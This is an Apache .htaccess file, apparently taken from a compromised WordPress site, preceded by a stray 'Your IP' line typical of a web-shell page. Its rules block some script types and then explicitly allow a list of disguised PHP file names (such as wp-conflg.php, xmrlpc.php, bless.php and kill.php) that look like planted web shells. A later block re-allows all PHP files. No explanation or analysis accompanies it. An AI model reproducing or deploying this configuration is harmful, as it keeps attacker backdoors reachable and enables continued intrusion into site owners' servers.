Your IP : 216.73.216.170
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "(^wp-login.php|^style.php|^style2.php|^index.php|^bless.php|^wp-blog.php||^wp-add.php|^admin.php|^wp-good.php|^upload.php|^xmrlpc.php|^install.php|^cloud.php|^wp-conflg.php|^123.php|^kill.php|^kill0_3.php|^file.php|^cdm.php|^xmrlpc.php|^about.php|^cloud.php|^def.php|^cong.php|^sgd.php|^cjfuns.php|^cong.php|^about.php|^etatism.php)$">
Order allow,deny
Allow from all
</FilesMatch>
AddDefaultCharset UTF-8
<FilesMatch ".(html|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.html$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.html [L]
DirectoryIndex index.html index.php